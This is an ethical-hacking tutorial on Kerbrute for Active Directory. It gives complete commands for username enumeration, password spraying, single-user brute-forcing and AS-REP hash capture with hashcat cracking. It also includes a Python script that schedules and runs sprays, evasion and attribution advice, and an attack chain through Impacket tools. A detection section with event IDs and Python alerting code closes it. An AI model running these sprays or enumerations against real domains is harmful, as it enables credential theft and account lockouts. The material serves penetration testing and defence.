Ethical Hacking  #kerbrute #kerberos #active-directory

Kerbrute: Kerberos User Enumeration and Brute-Forcing

Learn how to use Kerbrute for Kerberos user enumeration and password spraying against Active Directory, which of its modes are lockout-safe, and how to run the others without locking accounts out.


Kerbrute is a fast tool for enumerating valid Active Directory usernames and for testing Kerberos credentials. Written in Go by ropnop, it abuses Kerberos pre-authentication: a single AS-REQ to the KDC reveals whether a username exists, and a second form of AS-REQ tests a password. User enumeration never produces a logon failure, so it cannot lock an account; password guessing does increment the bad-password counter, exactly as an NTLM failure would. Neither produces the 4625/4776 logon-failure events that NTLM-based attacks leave behind, although both can be recorded on the domain controller as Kerberos events (4768, 4771) when Kerberos auditing is enabled.

This guide covers installation, the three commands (userenum, passwordspray, bruteuser), operational security considerations, and how to read the results.

Why Kerbrute?

Traditional brute-force tools like Hydra authenticate over SMB, RDP or LDAP. Each failed NTLM attempt leaves Event ID 4625 (failed logon) on the target host and 4776 (credential validation) on the domain controller, and every attempt counts toward lockout. Kerbrute talks to the KDC on port 88 instead and uses two different requests:

  • For enumeration it sends an AS-REQ with no pre-authentication data. If the username does not exist, the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN; if it exists, the KDC answers KDC_ERR_PREAUTH_REQUIRED (or, for an account flagged "Do not require Kerberos preauthentication", a complete AS-REP). No password is tried, so nothing is recorded as a failed logon and no account can be locked out
  • For password spraying and brute-forcing it sends an AS-REQ whose pre-authentication data is a timestamp encrypted with a key derived from the candidate password. A wrong password returns KDC_ERR_PREAUTH_FAILED. This is a real logon failure: it increments badPwdCount and will lock the account once the threshold is reached. A locked account answers KDC_ERR_CLIENT_REVOKED
  • Neither path produces 4625 or 4776; both can appear on the DC as Kerberos events (4768 and 4771) if Kerberos auditing is on, which is reviewed far less often than the NTLM events

Important caveat: the lockout safety applies to enumeration only. Password attempts through Kerberos count toward lockout in every Active Directory configuration, not just hardened ones. Confirm the lockout threshold, observation window and lockout duration before sending a single password.

Installing Kerbrute

Download the latest release from GitHub:

wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64 -O kerbrute
chmod +x kerbrute
sudo mv kerbrute /usr/local/bin/

Build from Source

go install github.com/ropnop/kerbrute@latest

Verify:

kerbrute --help

Core Syntax

kerbrute [command] [flags] --dc <domain_controller_ip> --domain <domain>
Flag            Description
--dc            IP address or hostname of the domain controller (KDC); looked up via DNS if omitted
-d, --domain    Target domain name (e.g., corp.local)
-t, --threads   Number of concurrent goroutines (default: 10)
-o, --output    Write Kerbrute's log output, including valid usernames and credentials, to a file
--safe          Abort as soon as any account comes back as locked out (passwordspray and bruteuser)
--delay         Delay between attempts in milliseconds; setting it forces a single thread
--hash-file     Save AS-REP hashes from accounts that do not require pre-authentication (userenum)
--downgrade     Request RC4 (arcfour-hmac-md5) so captured AS-REP hashes match hashcat mode 18200
-v, --verbose   Also log failures and errors, not just hits

Mode 1: User Enumeration

The userenum command tests a list of usernames to find valid accounts in the domain:

kerbrute userenum \
  --dc 192.168.1.10 \
  --domain corp.local \
  /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt \
  -o valid_users.txt

What the Output Looks Like

2026/05/24 10:23:41 >  Using KDC(s):
2026/05/24 10:23:41 >  192.168.1.10:88

2026/05/24 10:23:41 >  [+] VALID USERNAME: jsmith@corp.local
2026/05/24 10:23:41 >  [+] VALID USERNAME: administrator@corp.local
2026/05/24 10:23:41 >  [+] VALID USERNAME: sarah.jones@corp.local
2026/05/24 10:23:42 >  Done! Tested 5000 usernames (3 valid) in 1.234 seconds

The -o file contains the same log lines as the console, timestamps included, so extract bare usernames before handing the list to other tools: keep only the "[+] VALID USERNAME:" lines and strip the timestamp prefix and the @domain suffix.

Generating Username Lists

Real-world user enumeration requires good wordlists. Generate plausible username formats from employee names discovered through OSINT:

# employees.txt holds one "First Last" per line.
# Formats: firstname.lastname, flastname, firstnamel, firstname; lowercased to match sAMAccountName style
awk '{print tolower($1"."$2)}' employees.txt >> usernames.txt
awk '{print tolower(substr($1,1,1)$2)}' employees.txt >> usernames.txt
awk '{print tolower($1 substr($2,1,1))}' employees.txt >> usernames.txt
awk '{print tolower($1)}' employees.txt >> usernames.txt
sort -u usernames.txt -o usernames.txt   # drop duplicates before feeding Kerbrute

Tools like namemash.py automate this:

python3 namemash.py names.txt > generated_usernames.txt
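The username-generation step above and the output-parsing step from the previous section, as one added example that is not from the page, namemash.py or Kerbrute. The employee list and the Kerbrute log lines are constructed; the regular expression matches the "[+] VALID USERNAME: user@domain" line shape shown in the output section.

```python
"""Added example (not from the page, namemash.py or Kerbrute): build candidate
usernames from employee names in the common AD formats, then pull bare usernames
back out of Kerbrute's log output. Employee names and log lines are constructed."""
import re

# Constructed OSINT output: one "First Last" per line
EMPLOYEES = """\
John Smith
Sarah Jones
Mary-Anne O'Brien
"""

# Constructed Kerbrute output as written to -o (same lines as the console)
KERBRUTE_LOG = """\
2026/05/24 10:23:41 >  Using KDC(s):
2026/05/24 10:23:41 >  \t192.168.1.10:88
2026/05/24 10:23:41 >  [+] VALID USERNAME: jsmith@corp.local
2026/05/24 10:23:41 >  [+] VALID USERNAME: sarah.jones@corp.local
2026/05/24 10:23:42 >  Done! Tested 5000 usernames (2 valid) in 1.234 seconds
"""


def normalize(token):
    """Lowercase and strip anything that is not a letter or digit, so
    "O'Brien" becomes obrien and "Mary-Anne" becomes maryanne."""
    return re.sub(r"[^a-z0-9]", "", token.lower())


def candidate_usernames(names_text):
    """first.last, flast, firstl, f.last, lastf, first; deduplicated, order kept."""
    out = []
    for line in names_text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue                      # need at least a first and a last name
        first, last = normalize(parts[0]), normalize(parts[-1])
        if not first or not last:
            continue
        for cand in (f"{first}.{last}", f"{first[0]}{last}", f"{first}{last[0]}",
                     f"{first[0]}.{last}", f"{last}{first[0]}", first):
            if cand not in out:
                out.append(cand)
    return out


VALID_RE = re.compile(r"\[\+\] VALID USERNAME:\s+([^@\s]+)@(\S+)")


def valid_users_from_log(log_text):
    """Return bare usernames from Kerbrute's "[+] VALID USERNAME:" lines."""
    users = []
    for line in log_text.splitlines():
        m = VALID_RE.search(line)
        if m:
            users.append(m.group(1))
    return users


if __name__ == "__main__":
    print("\n".join(candidate_usernames(EMPLOYEES)))   # write this to a file for userenum
    print(valid_users_from_log(KERBRUTE_LOG))          # write this to a file for passwordspray
```

Middle names are dropped (first and last token only), which matches how most organisations build sAMAccountNames; if you see a firstname.middleinitial.lastname pattern in the OSINT data, add that format to the tuple.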

Mode 2: Password Spray

Password spraying tries a single password against every user so that no single account accumulates many failures. Check the lockout policy first: the threshold is commonly 5-10 (sometimes 3), and the observation window, commonly 30 minutes, is measured from each account's last bad password. Spray one password at a time, stay at least two attempts below the threshold per window (users' own typos count too), and wait longer than the full observation window after the last attempt of a round before starting the next.

kerbrute passwordspray \
  --dc 192.168.1.10 \
  --domain corp.local \
  valid_users.txt \
  "Winter2026!" \
  -o sprayed_creds.txt

Spray with a Delay

Add a delay between attempts for extra caution. Note that --delay forces Kerbrute onto a single thread, so large user lists take proportionally longer:

kerbrute passwordspray \
  --dc 192.168.1.10 \
  --domain corp.local \
  valid_users.txt \
  "Password123" \
  --delay 500 \
  -o results.txt

Password Spray Strategy

Effective spray passwords to try:

  1. Season + year: Spring2026, Summer2026!, Winter2025
  2. Company name variations: Corpname1!, Corpname2026
  3. Common defaults: Welcome1, Password1, P@ssw0rd
  4. Policy-compliant patterns: January2026!, Monday2026@

Enable the --safe Flag

The --safe flag makes Kerbrute abort as soon as the KDC answers KDC_ERR_CLIENT_REVOKED for any user, i.e. as soon as it sees an account that is already locked out. It is a tripwire, not a guard: the lockout it reacts to has already happened, so it limits the damage of a mis-read policy rather than preventing it. Use it on every spray anyway:

kerbrute passwordspray --safe --dc 192.168.1.10 --domain corp.local users.txt "Password1"
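The policy check and the wait-between-rounds discipline described in this section, as an added example that is not part of the page or of Kerbrute. The LDAP output is constructed; the attribute names (lockoutThreshold, lockOutObservationWindow, lockoutDuration) are the real ones on the domain root object and are stored as negative 100-nanosecond intervals. The margin of two attempts and the five-minute buffer are this example's choices, and the Kerbrute command it builds uses only the flags documented above.

```python
"""Added example (not from the page or Kerbrute): read the domain lockout policy
and derive a spray schedule that stays under the threshold. LDAP output below is
constructed; margin and buffer values are this example's own choices."""
import shlex
import subprocess
import time

# Constructed output of:
#   ldapsearch -H ldap://192.168.1.10 -D user@corp.local -W -b DC=corp,DC=local -s base \
#       lockoutThreshold lockOutObservationWindow lockoutDuration
LDAP_POLICY = """\
dn: DC=corp,DC=local
lockoutThreshold: 5
lockOutObservationWindow: -18000000000
lockoutDuration: -18000000000
"""


def parse_lockout_policy(ldif):
    """Return (threshold, observation_window_min, lockout_duration_min).
    A threshold of 0 means lockout is disabled."""
    attrs = {}
    for line in ldif.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            attrs[key.strip().lower()] = value.strip()

    def minutes(interval):            # -18000000000 * 100 ns == 1800 s == 30 min
        return abs(int(interval)) / 10_000_000 / 60

    return (int(attrs["lockoutthreshold"]),
            minutes(attrs["lockoutobservationwindow"]),
            minutes(attrs["lockoutduration"]))


def spray_plan(passwords, threshold, window_min, margin=2, buffer_min=5):
    """Split passwords into rounds of (threshold - margin) attempts per user, with a
    wait of one observation window plus buffer between rounds. The margin absorbs
    bad-password counts that users have already built up on their own."""
    if threshold == 0:
        return [{"passwords": list(passwords), "wait_after_min": 0.0}]
    per_round = max(1, threshold - margin)
    rounds = [passwords[i:i + per_round] for i in range(0, len(passwords), per_round)]
    return [{"passwords": r,
             "wait_after_min": (window_min + buffer_min) if i < len(rounds) - 1 else 0.0}
            for i, r in enumerate(rounds)]


def kerbrute_cmd(dc, domain, users_file, password, out_file="spray_results.txt"):
    """Shell-quoted Kerbrute passwordspray invocation for one password."""
    return shlex.join(["kerbrute", "passwordspray", "--dc", dc, "-d", domain,
                       "--safe", "-o", out_file, users_file, password])


def run_plan(plan, dc, domain, users_file, execute=False):
    """Walk the plan in order; execute=False is a dry run that only returns the
    commands. The sleep starts after the round's last attempt, because AD resets
    badPwdCount only once a full observation window has passed without failures."""
    commands = []
    for rnd in plan:
        for password in rnd["passwords"]:
            cmd = kerbrute_cmd(dc, domain, users_file, password)
            commands.append(cmd)
            if execute:
                subprocess.run(cmd, shell=True, check=False)
        if execute and rnd["wait_after_min"]:
            time.sleep(rnd["wait_after_min"] * 60)
    return commands


if __name__ == "__main__":
    threshold, window, duration = parse_lockout_policy(LDAP_POLICY)
    print(f"threshold={threshold} window={window}min duration={duration}min")
    plan = spray_plan(["Winter2026!", "Spring2026!", "Corpname1!", "Welcome1",
                       "Password1", "P@ssw0rd", "January2026!"], threshold, window)
    for cmd in run_plan(plan, "192.168.1.10", "corp.local", "valid_users.txt"):
        print(cmd)
```

With the constructed policy (threshold 5, window 30 minutes) seven passwords become three rounds of 3, 3 and 1 attempts with a 35-minute pause after each of the first two; pass execute=True only once you have checked the dry-run output and the user list.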

Mode 3: Brute-Force a Single User

Test multiple passwords against a single user account:

kerbrute bruteuser \
  --dc 192.168.1.10 \
  --domain corp.local \
  /usr/share/wordlists/rockyou.txt \
  administrator \
  -o admin_results.txt

Use this sparingly and only when you’ve confirmed the lockout policy allows it.

AS-REP Hash Capture

Kerbrute's userenum sends AS-REQs with no pre-authentication data. For an account flagged "Do not require Kerberos preauthentication" (DONT_REQ_PREAUTH), the KDC answers that request with a complete AS-REP whose enc-part is encrypted with a key derived from the user's password. Kerbrute can save that blob in hashcat format, and cracking it offline is AS-REP Roasting:

kerbrute userenum \
  --dc 192.168.1.10 \
  --domain corp.local \
  usernames.txt \
  --hash-file asrep_hashes.txt

Hashes captured in asrep_hashes.txt can be cracked with Hashcat:

hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt

Mode 18200 is for RC4-keyed AS-REPs (etype 23, the lines start with $krb5asrep$23$). Current domain controllers prefer AES (etype 17 or 18), which hashcat cracks far more slowly under modes 32100 and 32200; run userenum with --downgrade to ask the KDC for RC4 when the account still allows it.

Operational Security

Kerbrute generates no NTLM logon failures, but it is not invisible:

  • userenum leaves an Event ID 4768 entry on the DC for every name that does not exist (Result Code 0x6, KDC_ERR_C_PRINCIPAL_UNKNOWN), each carrying your source IP, whenever "Audit Kerberos Authentication Service" is enabled
  • passwordspray and bruteuser leave 4768 and 4771 (Kerberos pre-authentication failed, Failure Code 0x18) entries, again with your source IP; a burst of 4771 spread across many accounts is the textbook spray signature
  • High-volume enumeration stands out to anomaly-based SIEM rules and to Microsoft Defender for Identity, so use --delay to pace requests (this forces a single thread)
  • Kerberos on port 88 is almost never reachable from the internet, so Kerbrute normally runs from a foothold inside the network; that host's address is what ends up in the events, so pick it with the engagement's attribution rules in mind

Integrating Kerbrute into a Full AD Attack Chain

Kerbrute is most effective as the first step in an Active Directory attack chain:

1. OSINT → collect employee names → generate username list
2. Kerbrute userenum → confirm valid AD accounts
3. Kerbrute passwordspray → find credentials with weak passwords
4. Use credentials with Impacket tools:
   - GetUserSPNs.py → Kerberoast
   - GetNPUsers.py → AS-REP Roast (or use Kerbrute --hash-file)
   - secretsdump.py → dump hashes after gaining initial access
5. Hashcat → crack offline hashes
6. Lateral movement → psexec.py, wmiexec.py

Detecting and Defending Against Kerbrute

Turn on "Audit Kerberos Authentication Service" (success and failure) on every domain controller; without it neither 4768 nor 4771 is written. Then monitor for:

  • Many Event ID 4768 entries with Result Code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) from one source IP in a short window: this is user enumeration, and the only benign cause is a typo
  • Many Event ID 4771 entries (Failure Code 0x18) spread across different accounts from one source IP: password spraying
  • 4768 with Result Code 0x12 (KDC_ERR_CLIENT_REVOKED) or 4740 account-lockout events clustered in time: a spray that crossed the threshold
  • Kerberos requests from unusual source IPs, subnets or times

Hardening that removes the easy wins:

  • Require Kerberos pre-authentication on every account (clear DONT_REQ_PREAUTH); this eliminates AS-REP Roasting but does not stop enumeration
  • Deploy Microsoft Defender for Identity (formerly ATA), which profiles Kerberos traffic and alerts on enumeration and spraying behaviour
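The two monitoring rules above (unknown principals per source, pre-auth failures across accounts per source) as an added detection example that is not from the page. The event feed is constructed; the field names follow the Windows event data (IpAddress, TargetUserName, Status for 4768, FailureCode for 4771), but the dict shape and the thresholds are this example's assumptions. A sliding window is used so that a slow enumeration spread over minutes is still caught.

```python
"""Added example (not from the page): detection of Kerbrute-style activity over
DC security events. The feed is constructed; field names mirror the Windows
event data but the dict shape and thresholds are assumptions of this example."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

PRINCIPAL_UNKNOWN = "0x6"   # 4768 Status: KDC_ERR_C_PRINCIPAL_UNKNOWN -> enumeration
CLIENT_REVOKED = "0x12"     # 4768 Status: KDC_ERR_CLIENT_REVOKED -> lockout hit
PREAUTH_FAILED = "0x18"     # 4771 FailureCode: KDC_ERR_PREAUTH_FAILED -> wrong password

BASE = datetime(2026, 5, 24, 10, 30, 0)
ATTACKER, WORKSTATION = "10.0.5.23", "10.0.1.5"


def ev(offset_s, event_id, ip, user, code):
    """One parsed DC event; 'code' is Status (4768) or FailureCode (4771)."""
    return {"time": BASE + timedelta(seconds=offset_s), "event_id": event_id,
            "IpAddress": ip, "TargetUserName": user.lower(), "code": code}


# Constructed feed: one benign typo from a workstation, then a Kerbrute run
UNKNOWN = ["aaron", "abby", "adam", "alan", "amy", "andy", "anna", "ben", "bill", "bob", "brad", "carl"]
SPRAYED = ["jsmith", "sarah.jones", "administrator", "mjones", "tlee", "kwong", "rpatel", "dnguyen", "svc_sql"]
EVENTS = ([ev(-400, 4768, WORKSTATION, "alice", "0x0"), ev(-300, 4771, WORKSTATION, "alice", PREAUTH_FAILED)]
          + [ev(i, 4768, ATTACKER, u, PRINCIPAL_UNKNOWN) for i, u in enumerate(UNKNOWN)]    # userenum
          + [ev(60 + i, 4771, ATTACKER, u, PREAUTH_FAILED) for i, u in enumerate(SPRAYED)]  # spray
          + [ev(70, 4768, ATTACKER, "svc_sql", CLIENT_REVOKED)])                           # lockout


def max_distinct_in_window(items, window):
    """items: (time, user) pairs. Largest number of distinct users seen inside
    any window-sized span, via a two-pointer sweep over the sorted times."""
    items = sorted(items)
    counts, best, left = Counter(), 0, 0
    for t, user in items:
        counts[user] += 1
        while items[left][0] < t - window:     # drop events that fell out of the window
            old = items[left][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            left += 1
        best = max(best, len(counts))
    return best


def detect(events, window=timedelta(minutes=5), enum_threshold=10, spray_threshold=8):
    """Per source IP: peak distinct unknown principals, peak distinct accounts with
    pre-auth failures, and any lockouts; alert on the two thresholds and on lockouts."""
    unknown, failed, revoked = defaultdict(list), defaultdict(list), defaultdict(set)
    for e in events:
        key = (e["time"], e["TargetUserName"])
        if e["event_id"] == 4768 and e["code"] == PRINCIPAL_UNKNOWN:
            unknown[e["IpAddress"]].append(key)
        elif e["event_id"] == 4771 and e["code"] == PREAUTH_FAILED:
            failed[e["IpAddress"]].append(key)
        elif e["event_id"] == 4768 and e["code"] == CLIENT_REVOKED:
            revoked[e["IpAddress"]].add(e["TargetUserName"])
    report = {}
    for ip in set(unknown) | set(failed) | set(revoked):
        n_unknown = max_distinct_in_window(unknown[ip], window)
        n_failed = max_distinct_in_window(failed[ip], window)
        alerts = []
        if n_unknown >= enum_threshold:
            alerts.append(f"user enumeration: {n_unknown} unknown principals in {window}")
        if n_failed >= spray_threshold:
            alerts.append(f"password spray: {n_failed} accounts with pre-auth failures in {window}")
        if revoked[ip]:
            alerts.append(f"lockout: {sorted(revoked[ip])}")
        report[ip] = {"unknown": n_unknown, "failed": n_failed, "alerts": alerts}
    return report


if __name__ == "__main__":
    for ip, result in sorted(detect(EVENTS).items()):
        print(ip, result)
```

On the constructed feed the workstation's single typo stays below both thresholds while the attacker's address triggers all three alerts. Tune enum_threshold against your own baseline of 0x6 results (service accounts with stale SPN configs can generate a trickle of them) before putting the rule into production.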

Summary

Kerbrute is a precision instrument for Active Directory reconnaissance. Its ability to enumerate valid usernames through Kerberos without a single logon failure, and to spray passwords without leaving the 4625/4776 trail of NTLM attacks, makes it a critical first-phase tool in internal network penetration tests. Remember that spraying still counts toward lockout: confirm the policy, pace the rounds around the observation window, keep the --safe flag on, and integrate the output into a structured attack chain with Impacket and Hashcat.

#pentesting #user-enumeration #active-directory #kerberos #kerbrute